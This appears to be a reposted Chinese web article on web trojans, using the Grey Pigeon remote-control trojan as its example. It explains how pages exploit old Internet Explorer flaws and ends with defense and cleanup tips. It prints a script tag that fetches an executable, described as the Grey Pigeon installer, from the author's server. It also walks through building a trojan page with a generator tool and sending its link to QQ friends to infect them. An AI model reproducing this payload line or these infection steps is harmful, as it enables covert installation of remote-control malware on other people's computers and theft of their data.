小心防範網頁木馬

 

<iframe name="google_ads_frame" marginwidth="0" marginheight="0" src="http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-3528650120430763&dt=1183799909421&lmt=1183799909&format=468x60_as&output=html&correlator=1183799909421&url=http%3A%2F%2Fpages.google.com%2Fdraft%2FGmai9999%2Fhome%3Fauthtoken%3D397572419ac6db50f5ab16961d0b13491bee0967&ad_type=text_image&ref=http%3A%2F%2Fpages.google.com%2Fpreview%2FGmai9999%2Fhome%3Fauthtoken%3D9686509b5e94c7e953ceecc7a041fbc446802a9a%26no-cache%3D15040874706351293&ui=rc%3A0&flash=9&u_h=768&u_w=1024&u_ah=738&u_aw=1024&u_cd=32&u_tz=480&u_java=true" frameborder="0" width="468" scrolling="no" height="60" allowtransparency="allowtransparency"></iframe> 
現在的黑客爲了利益驅使，重點攻擊方式已轉變爲對網站網頁種植木馬，然後閱讀該網頁的用戶

就會將木馬下載到自己的電腦，從而達到控制用戶的目的。下面以“灰鴿子”爲例，簡單介紹一

下其工作原理及防範：

“灰鴿子”網頁木馬從原理、製作到防範


1.網頁木馬的攻擊原理- 2.爲什麼是灰鴿子- 3.網頁木馬的基本用法（1）- 4.網頁木馬的基本用法（2）- 5.網頁木馬的防範策略（1）- 6.網頁木馬的防範策略（2）-
編者按：事物都有兩面性。本文介紹的網頁木馬製作技巧，意在加強大家的防範意識，而不是想“荼毒生靈”。希望能給大家帶來一些幫助，營造一個安全的上網環境。

如果你訪問××網站（國內某門戶網站），你就會中灰鴿子木馬。這是我一黑客朋友給我說的一句說。打開該網站的首頁，經檢查，我確實中了灰鴿子。怎麼實現的呢？他說，他侵入了該網站的服務器並在網站主頁上掛了網頁木馬；一些安全專家常說，不要打開陌生人發來的網址，爲什麼？因爲該網址很有可能就是一些不懷好意者精心製作的網頁木馬。

以上只是網頁木馬的兩種形式，實際上網頁木馬還可以掛在多媒體文件（RM、RMVB、WMV、WMA、Flash）、電子郵件、論壇等多種文件和場合上。很可怕吧，那麼用戶如何防範網頁木馬呢？下面我們就先從網頁木馬的攻擊原理說起。

一、網頁木馬的攻擊原理

首先明確，網頁木馬實際上是一個HTML網頁，與其它網頁不同的是該網頁是黑客精心製作的，用戶一旦訪問了該網頁就會中木馬。爲什麼說是黑客精心製作的呢？因爲嵌入在這個網頁中的腳本恰如其分地利用了IE瀏覽器的漏洞，讓IE在後臺自動下載黑客放置在網絡上的木馬並運行（安裝）這個木馬，也就是說，這個網頁能下載木馬到本地並運行（安裝）下載到本地電腦上的木馬，整個過程都在後臺運行，用戶一旦打開這個網頁，下載過程和運行（安裝）過程就自動開始。

有朋友會說，打開一個網頁，IE瀏覽器真的能自動下載程序和運行程序嗎？如果IE真的能肆無忌憚地任意下載和運行程序，那天下還不大亂。實際上，爲了安全，IE瀏覽器是禁止自動下載程序特別是運行程序的，但是，IE瀏覽器存在着一些已知和未知的漏洞，網頁木馬就是利用這些漏洞獲得權限來下載程序和運行程序的。下面我舉IE瀏覽器早期的一個漏洞來分別說明這兩個問題。

⒈自動下載程序

<SCRIPT LANGUAGE="icyfoxlovelace" src="http://go163go.vicp.net/1.exe"></SCRIPT>


小提示：代碼說明

a. 代碼中“src”的屬性爲程序的網絡地址，本例中“http://go163go.vicp.net/1.exe”爲我放置在自己Web服務器上的灰鴿子服務端安裝程序，這段代碼能讓網頁下載該程序到瀏覽它的電腦上。

b. 也可以把木馬程序上傳到免費的主頁空間上去，但免費空間出於安全的考慮，多數不允許上傳exe文件，黑客可能變通一下把擴展名exe改爲bat或com，這樣他們就可以把這些程序上傳到服務器上了。

把這段代碼插入到網頁源代碼的</BODY>…</BODY>之間（如圖1），然後用沒打補丁的IE6打開，接下來，打開IE的臨時目錄<Temporary Internet Files>，你會發現，在該文件夾中有一個“1.exe”文件，這也就是說，該網頁已自動下載了我放置在Web服務器上的灰鴿子木馬。

二、網頁木馬的基本用法

理解了網頁木馬攻擊的原理，我們可以製作自己的網頁木馬，但這需要你根據IE漏洞寫出利用代碼。實際上，在網上有很多高手已寫出了一些漏洞的利用代碼，有的還把它寫成了可視化的程序。在搜索引擎輸入“網頁木馬生成器”進行搜索，你會發現，在網上有很多利用IE的各種漏洞編寫的網頁木馬生成器，它們大都爲可視化的程序，只要你有一個木馬（該木馬必須把它放置到網絡上），利用這些生成器你就可以立即生成一個網頁，該網頁就是網頁木馬，只要他人打開這個網頁，該網頁就可以自動完成下載木馬並運行（安裝）木馬的過程。

在我的電腦上我已下載了一個網頁木馬生成器，下面我們來看怎麼生成網頁木馬並讓他人中木馬。

第一步：啓動該網頁木馬生成器，如圖4所示，在文本框中輸入木馬的網絡地址，最後單擊“生成”。



圖4 網頁木馬生成器

第二步：在網頁木馬生成器的安裝文件夾會生成一個網頁文件，該文件就是我們在上一步生成的網頁木馬。上傳該文件到自己的Web服務器或免費主面空間。

現在好了，把上述網頁在服務器上的地址（網址）通過QQ發給自己的好友，一旦他訪問了該網頁，該網頁就會在他的電腦上自動下載並運行你放置在網絡上的木馬。

現在你該明白安全專家勸告的“不要打開陌生人發來的網絡地址”這句話的真諦了吧！實際上，即使人人都不打開陌生人發來的網址，也仍然有一些人“飛蛾補燈，自尋死路”，因爲若大的Internet，總會有一些人會有意或無意地訪問這些網址，而且，有些網頁木馬，還掛在一些知名網站上（根據知名網站的訪問量，你算算吧，每天有多少人中了木馬！）。

小提示：你可能還沒想到，看電影，在論壇查看或回覆帖子也能中木馬。實際上，網頁木馬還可以掛在多媒體文件、電子郵件、論壇、CHM電子書上，這樣，用戶一旦觀看電影、查看或預覽郵件（主要是一些用電子郵件羣發器發送的垃圾郵件）、參與帖子，打開電子書，用戶就會中網頁木馬。

<iframe name="google_ads_frame" marginwidth="0" marginheight="0" src="http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-0494631679463850&dt=1183337725953&lmt=1183337725&prev_fmts=120x600_as&format=468x60_as&output=html&correlator=1183337725718&url=http%3A%2F%2Fbluestar.skyking.googlepages.com%2Fadsensepage&ad_type=text_image&cc=100&flash=9&u_h=768&u_w=1024&u_ah=738&u_aw=1024&u_cd=32&u_tz=480&u_java=true" frameborder="0" width="468" scrolling="no" height="60" allowtransparency="allowtransparency"></iframe> 
防範與殺毒：

爲了防範網頁木馬，建議大家趕緊下載firefox瀏覽器，從而可以極大的降低被網頁木馬攻擊的機率，當然該瀏覽器也不完全能避免，因爲現在針對firefox瀏覽器的網頁木馬也已經被製作出來，但相對IE瀏覽器的攻擊機率，還是很小的。

網頁木馬就是利用你係統或軟件的漏洞,在你瀏覽網頁時下載一個木馬程序,再利用該木馬來控制你的電腦,盜取你的有用資料!

解決辦法：1,修復IE，可以用黃山IE修復專家修復一下，去華軍軟件園後面網址下載就行。http://yncnc.onlinedown.net/soft/18437.htm 這個方法可以修復IE，或者瑞星卡卡上網安全助手 以防止以後被惡意修改 地址 http://tool.ikaka.com/ 還有Windows流氓軟件清理大師
http://dl.pconline.com.cn/html/1/0/dlid=14270&dltypeid=1&pn=0&.html 一個完全免費的超強的系統維護工具，能夠檢測、清理已知的大多數廣告軟件、工具條和流氓軟件。比起其它同類軟件，清理軟件更方便、更徹底，並且是國內唯一能真正徹底清理流氓軟件所有的註冊表及文件記錄，不需要進入DOS，不需要進入安全模式，不需要備份註冊表，只要清理後重新啓動一次即可卸載乾淨。
2，查看啓動項,另外爲了你電腦啓動快一下 ;還有就是查看一下是不是啓動項目裏面有病毒，你可以點擊開始－運行－輸入msconfig回車出現對話框 把上面最後一個啓動項裏面的除了輸入法（ctfmon）以外其他沒有用的啓動項前面的勾去掉（全部去掉也可以），重新啓動.2000系統沒有這個命令你可以http://blog.playes.net/Down/msconfig.rar 到這裏下載，解壓後雙擊即可使用。
3，殺毒，升級殺毒軟件，到安全模式徹底殺毒，進入安全模式的方法，開機的時候連續快速的按F8，出現菜單選擇安全模式進入就可以。 
<iframe name="google_ads_frame" marginwidth="0" marginheight="0" src="http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-3528650120430763&dt=1183799909421&lmt=1183799909&format=468x60_as&output=html&correlator=1183799909421&url=http%3A%2F%2Fpages.google.com%2Fdraft%2FGmai9999%2Fhome%3Fauthtoken%3D397572419ac6db50f5ab16961d0b13491bee0967&ad_type=text_image&ref=http%3A%2F%2Fpages.google.com%2Fpreview%2FGmai9999%2Fhome%3Fauthtoken%3D9686509b5e94c7e953ceecc7a041fbc446802a9a%26no-cache%3D15040874706351293&ui=rc%3A0&flash=9&u_h=768&u_w=1024&u_ah=738&u_aw=1024&u_cd=32&u_tz=480&u_java=true" frameborder="0" width="468" scrolling="no" height="60" allowtransparency="allowtransparency"></iframe>